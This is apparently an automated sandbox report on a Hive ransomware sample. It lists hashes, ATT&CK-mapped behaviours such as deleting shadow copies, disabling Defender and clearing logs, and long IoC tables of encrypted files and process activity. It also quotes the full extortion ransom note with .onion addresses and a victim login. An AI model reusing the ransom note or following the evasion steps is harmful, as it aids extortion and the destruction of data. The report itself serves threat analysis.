hive | 5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584

General

Target

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
Size

2.5MB
MD5

80174956b0d1849ee802490817a2748f
SHA1

8b6648922a6d2bb1ccb419273814387940ad9fcb
SHA256

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584
SHA512

0b2191126fc2d1f49561439c8e790b67820af86ecad9736c8b44f50a0b4bf7f63a5d7ab7610523ce99c15d208baa43f054afbf0c66f469523b87be1b70f75073

Score

10^/10

hive evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\b8Bo_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: K61rvptCkHNr Password: vnCCQBqnH1iDfrYcrYwd To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.accuj files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

MpCmdRun.exe

pid process

1232 MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1232	MpCmdRun.exe

Drops file in Program Files directory 64 IoCs

Processes:

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\RunningLate.scale-80.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_kOJ-5uSaNJ00.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_oT3hoRbHOqg0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\fr-FR.PhoneNumber.SMS.ot	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\11s.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-100_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-100_contrast-black.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.ViewerPlugin\ReliveSurfaces\Video\ReliveVideoControl.xaml	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-80_altform-unplated.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-200.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\es-ES.PhoneNumber.ot	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\ui-strings.js.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_gUsihDVk6Wk0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_6De09ym8k800.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostTitle.XSL.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_EvsRjN16qS00.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Lumia.ViewerPlugin\ReliveSurfaces\Preview\RelivePreviewControl.xaml	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Light.scale-200.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwnumbered.dotx.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_8Cr33mLMIZA0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_f_col.hxk.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_87ht9VwehR40.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-200.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-400.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Outlook.scale-400.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_AIqsneiE_LI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_AQ47cWnEQ1A0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_K_COL.HXK.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_X9VfiqAfhVI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\charsets.jar.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_Zg-ZCu47ukA0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\MedTile.scale-200.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Eye.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_CreateNotes_LTR_Phone.mp4	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_9aK_FyZdaPo0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\pt-BR\tipresx.dll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_pOQgb6IEgk80.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.ITS.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_VOdJ17vz6u40.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\proof.fr-fr.msi.16.fr-fr.vreg.dat.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_f4rppeVF-7I0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\fr-FR\wmpnssci.dll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Common Files\microsoft shared\VSTO\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages.png.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_XcZTkQkQe2I0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_XEHBKK2Otio0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\ui-strings.js.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_gJhTPSHHtYI0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.aff.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_tW4PgfS2aoU0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\bi_16x11.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Glasses.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_2x.png.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_FP3r0ShuIB00.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\ui-strings.js.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_EP5oyMCHJgs0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_Subscription-pl.xrm-ms.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_BMxgan_NSzo0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_r-B-_lLi41E0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_IWw1bX-JCNo0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui.xml	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\nl-NL\tipresx.dll.mui	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Particles\cardBounce.respack	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-30.png	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\b8Bo_HOW_TO_DECRYPT.txt	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo.IoQTe72WtK-CcMwkiQuYdx9tLRwep3hDogPbzkKizkT_pbbgYKAczKw0.accuj	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_32	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3700 vssadmin.exe
Runs net.exe

pid	process
3700	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

pid	process
1408	powershell.exe
1408	powershell.exe
1408	powershell.exe
1072	powershell.exe
1072	powershell.exe
1072	powershell.exe
2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe
2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exe

description	pid	process
Token: SeSecurityPrivilege	2972	wevtutil.exe
Token: SeBackupPrivilege	2972	wevtutil.exe
Token: SeSecurityPrivilege	2416	wevtutil.exe
Token: SeBackupPrivilege	2416	wevtutil.exe
Token: SeSecurityPrivilege	2756	wevtutil.exe
Token: SeBackupPrivilege	2756	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	2200	wmic.exe
Token: SeSecurityPrivilege	2200	wmic.exe
Token: SeTakeOwnershipPrivilege	2200	wmic.exe
Token: SeLoadDriverPrivilege	2200	wmic.exe
Token: SeSystemProfilePrivilege	2200	wmic.exe
Token: SeSystemtimePrivilege	2200	wmic.exe
Token: SeProfSingleProcessPrivilege	2200	wmic.exe
Token: SeIncBasePriorityPrivilege	2200	wmic.exe
Token: SeCreatePagefilePrivilege	2200	wmic.exe
Token: SeBackupPrivilege	2200	wmic.exe
Token: SeRestorePrivilege	2200	wmic.exe
Token: SeShutdownPrivilege	2200	wmic.exe
Token: SeDebugPrivilege	2200	wmic.exe
Token: SeSystemEnvironmentPrivilege	2200	wmic.exe
Token: SeRemoteShutdownPrivilege	2200	wmic.exe
Token: SeUndockPrivilege	2200	wmic.exe
Token: SeManageVolumePrivilege	2200	wmic.exe
Token: 33	2200	wmic.exe
Token: 34	2200	wmic.exe
Token: 35	2200	wmic.exe
Token: 36	2200	wmic.exe
Token: SeIncreaseQuotaPrivilege	3980	wmic.exe
Token: SeSecurityPrivilege	3980	wmic.exe
Token: SeTakeOwnershipPrivilege	3980	wmic.exe
Token: SeLoadDriverPrivilege	3980	wmic.exe
Token: SeSystemProfilePrivilege	3980	wmic.exe
Token: SeSystemtimePrivilege	3980	wmic.exe
Token: SeProfSingleProcessPrivilege	3980	wmic.exe
Token: SeIncBasePriorityPrivilege	3980	wmic.exe
Token: SeCreatePagefilePrivilege	3980	wmic.exe
Token: SeBackupPrivilege	3980	wmic.exe
Token: SeRestorePrivilege	3980	wmic.exe
Token: SeShutdownPrivilege	3980	wmic.exe
Token: SeDebugPrivilege	3980	wmic.exe
Token: SeSystemEnvironmentPrivilege	3980	wmic.exe
Token: SeRemoteShutdownPrivilege	3980	wmic.exe
Token: SeUndockPrivilege	3980	wmic.exe
Token: SeManageVolumePrivilege	3980	wmic.exe
Token: 33	3980	wmic.exe
Token: 34	3980	wmic.exe
Token: 35	3980	wmic.exe
Token: 36	3980	wmic.exe
Token: SeIncreaseQuotaPrivilege	3980	wmic.exe
Token: SeSecurityPrivilege	3980	wmic.exe
Token: SeTakeOwnershipPrivilege	3980	wmic.exe
Token: SeLoadDriverPrivilege	3980	wmic.exe
Token: SeSystemProfilePrivilege	3980	wmic.exe
Token: SeSystemtimePrivilege	3980	wmic.exe
Token: SeProfSingleProcessPrivilege	3980	wmic.exe
Token: SeIncBasePriorityPrivilege	3980	wmic.exe
Token: SeCreatePagefilePrivilege	3980	wmic.exe
Token: SeBackupPrivilege	3980	wmic.exe
Token: SeRestorePrivilege	3980	wmic.exe
Token: SeShutdownPrivilege	3980	wmic.exe
Token: SeDebugPrivilege	3980	wmic.exe
Token: SeSystemEnvironmentPrivilege	3980	wmic.exe
Token: SeRemoteShutdownPrivilege	3980	wmic.exe
Token: SeUndockPrivilege	3980	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2388 wrote to memory of 3680	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 3680	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 3680	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 3680 wrote to memory of 2756	3680	net.exe	net1.exe
PID 3680 wrote to memory of 2756	3680	net.exe	net1.exe
PID 3680 wrote to memory of 2756	3680	net.exe	net1.exe
PID 2388 wrote to memory of 984	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 984	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 984	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 984 wrote to memory of 4092	984	net.exe	net1.exe
PID 984 wrote to memory of 4092	984	net.exe	net1.exe
PID 984 wrote to memory of 4092	984	net.exe	net1.exe
PID 2388 wrote to memory of 2752	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 2752	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 2752	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2752 wrote to memory of 1204	2752	net.exe	net1.exe
PID 2752 wrote to memory of 1204	2752	net.exe	net1.exe
PID 2752 wrote to memory of 1204	2752	net.exe	net1.exe
PID 2388 wrote to memory of 824	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 824	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 824	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 824 wrote to memory of 3936	824	net.exe	net1.exe
PID 824 wrote to memory of 3936	824	net.exe	net1.exe
PID 824 wrote to memory of 3936	824	net.exe	net1.exe
PID 2388 wrote to memory of 2012	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 2012	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2388 wrote to memory of 2012	2388	5b32ac4754bd5728cc7a68f341bf64cec4a737eb584814bb2099a5f2ff69e584.bin.sample.exe	net.exe
PID 2012 wrote to memory of 4044	2012	net.exe	net1.exe
